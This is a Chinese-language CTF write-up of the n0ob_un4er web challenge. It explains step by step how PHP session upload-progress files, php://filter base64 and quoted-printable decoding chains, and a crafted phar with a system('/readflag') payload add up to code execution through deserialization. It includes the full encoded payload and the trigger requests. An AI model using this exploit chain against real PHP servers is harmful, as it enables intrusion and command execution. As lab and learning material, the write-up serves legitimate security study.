CTF-WEB: php-Session 文件利用 [第一届国城杯 n0ob_un4er 赛后学习笔记]

step 1

搭建容器

教程

A5rZ

题目

github.com

Dockerfile 有点问题,手动修复一下

FROM php:7.2-apacheCOPY ./flag /root
COPY ./readflag /
COPY ./html/ /var/www/html/
COPY ./php.ini /usr/local/etc/php/php.ini
COPY ./readflag /readsecretRUN chmod 755 /var/www/html && chown -R root:www-data /var/www/html && chmod 400 /root/flag && chmod 4111 /readflag

修改php ini

; session.upload_progress.cleanup = On

session.upload_progress.cleanup = Off

不修改的话/tmp里的东西会被删掉,就看不了了

step 2

<?php
$SECRET  = `/readsecret`;
include "waf.php";
class User {public $role;function __construct($role) {$this->role = $role;}
}
class Admin{public $code;function __construct($code) {$this->code = $code;}function __destruct() {echo "Admin can play everything!";eval($this->code);}
}
function game($filename) {if (!empty($filename)) {if (waf($filename) && @copy($filename , "/tmp/tmp.tmp")) {echo "Well done!";} else {echo "Copy failed.";}} else {echo "User can play copy game.";}
}
function set_session(){global $SECRET;$data = serialize(new User("user"));$hmac = hash_hmac("sha256", $data, $SECRET);setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}
function check_session() {global $SECRET;$data = $_COOKIE["session-data"];list($data, $hmac) = explode("-----", $data, 2);if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac) || !hash_equals(hash_hmac("sha256", $data, $SECRET), $hmac)) {die("hacker!");}$data = unserialize($data);if ( $data->role === "user" ){game($_GET["filename"]);}else if($data->role === "admin"){return new Admin($_GET['code']);}return 0;
}
if (!isset($_COOKIE["session-data"])) {set_session();highlight_file(__FILE__);
}else{highlight_file(__FILE__);check_session();
}
User can play copy game.

我们可以利用Session临时文件,关于临时文件,请看以下文章
国城杯n0ob_un4er-wp - Litsasuk - 博客园
PHP: Session 上传进度 - Manual
浅谈 SESSION_UPLOAD_PROGRESS 的利用-腾讯云开发者社区-腾讯云

这里第二个file是什么不重要,只要是文件就可以

curl http://127.0.0.1:1337/ -H 'Cookie: PHPSESSID=litsasuk' -F 'PHP_SESSION_UPLOAD_PROGRESS=[Your_data]' -F 'file=@/etc/passwd'

root@07710596cbbe:/# cd ./tmp
root@07710596cbbe:/tmp# ls
sess_litsasuk
root@07710596cbbe:/tmp# cat sess_litsasuk 
upload_progress_[Your_data]|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}

step 3

copy可以通过伪协议触发phar反序列化

<?php
highlight_file(__FILE__);
class Admin{public $code;
}
@unlink('test.phar');
$phar=new Phar('test.phar');
$phar->startBuffering();
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$o=new Admin();
$o ->code="system('/readflag');";
$phar->setMetadata($o);
$phar->addFromString("test.txt","test");
$phar->stopBuffering();
?>

step 4

试验

<?php  
// 文件名  
$inputFile = 'test'; // 输入文件名  
$outputFile = 'test'; // 输出文件名  // 打开输入文件并读取内容  
$inputHandle = fopen("php://filter/read=convert.base64-decode/resource=$inputFile", 'r');  
if (!$inputHandle) {  die("无法打开输入文件: $inputFile");  
}  // 读取解码后的内容  
$decodedContent = stream_get_contents($inputHandle);  
fclose($inputHandle);  // 打开输出文件并写入解码后的内容  
$outputHandle = fopen($outputFile, 'w');  
if (!$outputHandle) {  die("无法打开输出文件: $outputFile");  
}  fwrite($outputHandle, $decodedContent);  
fclose($outputHandle);  echo "文件解码并写回成功!";  
?>

原理部分

字符串“Man”的Base64编码

1. 输入数据：

   • 字符串“Man”的ASCII码是：

     M: 77 (01001101)
     a: 97 (01100001)
     n: 110 (01101110)
     

   • 合并成二进制数据：

     01001101 01100001 01101110
     

2. 分成6位块：

   • 划分后得到：

     010011 010110 000101 101110
     

3. 转换为十进制：

   • 每个6位块对应的整数是：

     19 22 5 46
     

4. 映射到Base64字符集：

   • 使用Base64字符表对应的字符是：

     T W F u
     

因此，字符串“Man”被Base64编码后就是“TWFu”。

字符串“Ma”的Base64编码

1. 输入数据：

   • 字符串“Ma”的ASCII码是：

     M: 77 (01001101)
     a: 97 (01100001)
     

2. 补齐到3字节：

   • 补齐后变成：

     01001101 01100001 00000000
     

3. 分成6位块：

   • 划分后得到：

     010011 010110 000100 000000
     

4. 转换为十进制：

   • 每个6位块对应的整数是：

     19 22 4 0
     

5. 映射到Base64字符集：

   • 使用Base64字符表对应的字符是：

     T W E A
     

6. 添加填充字符：

   • 因为原始数据不足3字节，我们在末尾添加一个等号（=），表示有1个字节填充。
   • 最终结果是：

    TWE=
   

试验开始

d2lu

decode->

win

and

----d2lu

decode->

win

试验得出结论,php在base64解码时会忽视base64表以外的内容,base64表如下

ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

upload_progress_ 的有效字符只有14个,所以
从docker抓取文件内容试验

upload_progress_aad2lu|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}

decode->

簷hi趉?薏茪wink?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<

我们能看到win在其中

我们再双重编码一下win

ZDJsdUNnPT0

upload_progress_aaZDJsdUNnPT0|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}

簷hi趉?薏茪d2luCg==嫱t仓卅z-{?}舆5砠^炠^?a媫第蛓o+^矚鑡?y胤踋?y絣屮频婩怀]夐]潻灣団曤8潻灣猌蔡乘f蛒榠 髣?9z鸿?,嶷'y絣譑-j籱奼⒆谨鬏=骩5寮瓃蔾∏鏱巯;

我们能看到d2lu在其中,但是有一个问题,前面的有效字符不够了,只有两个破坏对齐了就没办法正确解码了,我们可以试试这样

编码 222—d2lu

YWEtLS1kMmx1

upload_progress_aaMjItLS1kMmx1=|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}

decode->

簷hi趉?薏茪22---d2luk?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<

失败了,我们换个方法

---

Quoted-Printable 是一种用于编码数据的方式，特别是在电子邮件传输（MIME 标准）中广泛使用。它的主要目的是确保数据在不同系统之间传输时保持一致性，避免因编码问题导致的数据损坏。

特点：

1. 可读性：大部分可打印的ASCII字符在编码后保持不变，因此人类可以在一定程度上阅读编码后的内容。
2. 安全性：非ASCII字符和特殊字符会被编码为 =XX 的格式，其中 XX 是该字符的十六进制ASCII码。
3. 换行处理：长行会被拆分，并在行尾使用 = 表示续行。

Quoted-Printable 解码

Quoted-Printable 解码 是指将使用 Quoted-Printable 编码的数据转换回原始的可读格式。这个过程包括：

1. 识别转义序列：查找以 = 开头的序列，这些序列表示特定的字符。例如，=3D 表示 = 字符，=0A 表示换行符。
2. 转换字符：将这些转义序列转换回它们对应的原始字符。
3. 处理换行：移除行尾的 = 并合并拆分的行。

---

这个东西编码后的密文只会是3的倍数,确保了对齐,我们直接用wp的有效负载研究原理

<?php  // 假设这是经过编码处理的最终 Base64 编码字符串  
$encoded_string = file_get_contents('./test.txt');  // 第一步：Base64 解码  
$base64_decoded = base64_decode($encoded_string);  
$base64_decoded = base64_decode($base64_decoded);  
$base64_decoded = base64_decode($base64_decoded);  
echo "Step 1 - Base64 Decode: \n";  
echo $base64_decoded . "\n\n";  // 第二步：Quoted-Printable 解码  
$quoted_printable_decoded = quoted_printable_decode($base64_decoded);  
echo "Step 2 - Quoted-Printable Decode: \n";  
echo $quoted_printable_decoded . "\n\n";  // 第四步：Base64 解码（再次）  
$final_decoded = base64_decode($quoted_printable_decoded);  
echo "Step 4 - Final Base64 Decode: \n";  
echo $final_decoded . "\n\n";  
?>

import base64# 读取文件内容
with open('test.phar', 'rb') as file:file_content = file.read()# 第一步：将文件内容进行 Base64 编码
base64_encoded = base64.b64encode(file_content).decode('utf-8')# 第二步：将 Base64 编码后的内容转换为指定的格式
encoded_str = ''.join(['=' + hex(ord(char))[2:] + '=00' for char in base64_encoded]).upper()# 打印结果
print(encoded_str)

upload_progress_ZZVUZSVmQxQlVRWGRRVkZFd1VGUkJkMUJVVFRWUVZFRjNVRlJqTTFCVVFYZFFWRmw0VUZSQmQxQlVVVFJRVkVGM1VGUlJlRkJVUVhkUVZGa3pVRlJCZDFCVVZUUlFWRUYzVUZSTmVGQlVRWGRRVkUwMVVGUkJkMUJVVVRWUVZFRjNVRlJWZUZCVVFYZFFWRlV4VUZSQmQxQlVZelJRVkVGM1VGUlZNVkJVUVhkUVZGVTBVRlJCZDFCVVRYZFFWRUYzVUZSU1JsQlVRWGRRVkZWM1VGUkJkMUJVVlRCUVZFRjNVRlJWTWxCVVFYZFFWRkY1VUZSQmQxQlVVa0pRVkVGM1VGUlZNRkJVUVhkUVZGRXhVRlJCZDFCVVZUSlFWRUYzVUZSVmVsQlVRWGRRVkZKRFVGUkJkMUJVVVhwUVZFRjNVRlJhUTFCVVFYZFFWRTB6VUZSQmQxQlVVVFZRVkVGM1VGUlJNRkJVUVhkUVZFMDBVRlJCZDFCVVNrTlFWRUYzVUZSUk1GQlVRWGRRVkZWNFVGUkJkMUJVWTNkUVZFRjNVRlJqTUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSVmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY1VUZSQmQxQlVVVEZRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNVVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSTmVsQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVWVEJRVkVGM1VGUmtRbEJVUVhkUVZGcEhVRlJCZDFCVVRYaFFWRUYzVUZSU1IxQlVRWGRRVkZrMVVGUkJkMUJVVWtKUVZFRjNVRlJSZVZCVVFYZFFWRlpDVUZSQmQxQlVVVE5RVkVGM1VGUk5lRkJVUVhkUVZHTjNVRlJCZDFCVVdYbFFWRUYzVUZSWk5WQlVRWGRRVkZFMVVGUkJkMUJVVFRKUVZFRjNVRlJTUlZCVVFYZFFWRlV3VUZSQmQxQlVZM2RRVkVGM1VGUk5NMUJVUVhkUVZGbDZVRlJCZDFCVVpFSlFWRUYzVUZSYVIxQlVRWGRRVkUxM1VGUkJkMUJVVWtkUVZFRjNVRlJaTlZCVVFYZFFWRkpDVUZSQmQxQlVXa0pRVkVGM1VGUlplVkJVUVhkUVZFMTVVRlJCZDFCVVZYbFFWRUYzVUZSYVJGQlVRWGRRVkZFMVVGUkJkMUJVV2tKUVZFRjNVRlJqTUZCVVFYZFFWR1JDVUZSQmQxQlVVa2RRVkVGM1VGUmFRbEJVUVhkUVZGRTFVRlJCZDFCVVl6TlFWRUYzVUZSU1IxQlVRWGRRVkZrMVVGUkJkMUJVVWtKUVZFRjNVRlJrUWxCVVFYZFFWRmt4VUZSQmQxQlVWVFJRVkVGM1VGUlNSbEJVUVhkUVZFMTNVRlJCZDFCVVZrSlFWRUYzVUZSVk0xQlVRWGRRVkUxM1VGUkJkMUJVV2tkUVZFRjNVRlJTUWxCVVFYZFFWR00xVUZSQmQxQlVUVFZRVkVGM1VGUmpOVkJVUVhkUVZGWkNVRlJCZDFCVVZUTlFWRUYzVUZSUk1sQlVRWGRRVkZwRFVGUkJkMUJVVmtKUVZFRjNVRlJhUlZCVVFYZFFWR00wVUZSQmQxQlVXVFJRVkVGM1VGUldRbEJVUVhkUVZHTTFVRlJCZDFCVVdYcFFWRUYzVUZSamQxQlVRWGRRVkZKSFVGUkJkMUJVWXpWUVZFRjNVRlJSTlZCVVFYZFFWRTB6VUZSQmQxQlVXVEpRVkVGM1VGUlZlRkJVUVhkUVZGa3pVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhsUVZFRjNVRlJOZDFCVVFYZFFWRlpDVUZSQmQxQlVWVFJRVkVGM1VGUlNSbEJVUVhkUVZFMTNVRlJCZDFCVVVrUlFWRUYzVUZSYVJsQlVRWGRRVkZWNVVGUkJkMUJVVFRCUVZFRjNVRlJaTUZCVVFYZFFWRkY0VUZSQmQxQlVWWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUk1GQlVRWGRRVkZrd1VGUkJkMUJVVlRSUVZFRjNVRlJSZVZCVVFYZFFWR013VUZSQmQxQlVXa1pRVkVGM1VGUlJlVkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNFVGUkJkMUJVVVhoUVZFRjNVRlJqTkZCVVFYZFFWRXBEVUZSQmQxQlVXVEpRVkVGM1VGUk5OVkJVUVhkUVZGazFVRlJCZDFCVVRYbFFWRUYzVUZSUmVGQlVRWGRRVkZWNFVGUkJkMUJVVVhoUVZFRjNVRlJSZUZCVVFYZFFWRkY0VUZSQmQxQlVVWGhRVkVGM1VGUlJlRkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUk5GQlVRWGRRVkZWNVVGUkJkMUJVV2tSUVZFRjNVRlJaZWxCVVFYZFFWRTE2VUZSQmQxQlVWWGxRVkVGM1VGUlNRbEJVUVhkUVZGVjVVRlJCZDFCVVVrZFFWRUYzVUZSTmQxQlVRWGRRVkdNeVVGUkJkMUJVVlRWUVZFRjNVRlJqTVZCVVFYZFFWRkpEVUZSQmQxQlVUVEZRVkVGM1VGUk5NVkJVUVhkUVZGSkNVRlJCZDFCVVRYcFFWRUYzVUZSV1FsQlVRWGRRVkdONVVGUkJkMUJVU2tOUVZFRjNVRlJSTkZCVVFYZFFWR04zVUZSQmQxQlVUVEJRVkVGM1VGUk5NMUJVUVhkUVZGRXlVRlJCZDFCVVVrTlFWRUYzVUZSWk5GQlVRWGRRVkZwSFVGUkJkMUJVVlRCUVZFRjNVRlJaTWxCVVFYZFFWRkV6VUZSQmQxQlVZek5RVkVGM1VGUlJOVkJVUVhkUVZGRjRVRlJCZDFCVVVYaFFWRUYzVUZSUmVGQlVRWGRRVkZGNVVGUkJkMUJVVVRSUVZFRjNVRlJWZUZCVVFYZFFWRnBEVUZSQmQxQlVUWGhRVkVGM1VGUlJlbEJVUVhkUlZVWkNVVlZHUWxGVlJrSlJWVVpD|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}

注意,必须填充A(解码后为0)确保每次加密后不存在=

Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAwټ Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAwټ Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt�\g~ضtestID�/b��ٯ���J���GBMB

不填充ZZ填充FF也可以,主要在于其解码后字符化为的有效字符数是否能对齐(自己解码试试!)

Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAwټ Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAwټ Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt�\g~ضtestID�/b��ٯ���J���GBMB

step 5

1.让copy从临时文件读取数据到/tmp/tmp.tmp

?filename=php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=filename

此处利用方法不唯一,可能有更简单的
字符串过滤器
转换过滤器

2.从tmp中解码文件并解析phar中的test.txt文件触发反序列化来执行命令(如果没关php默认清除需要条件竞争)

phar:///tmp/tmp.tmp/test.txt

end --A5rZ 24-12-12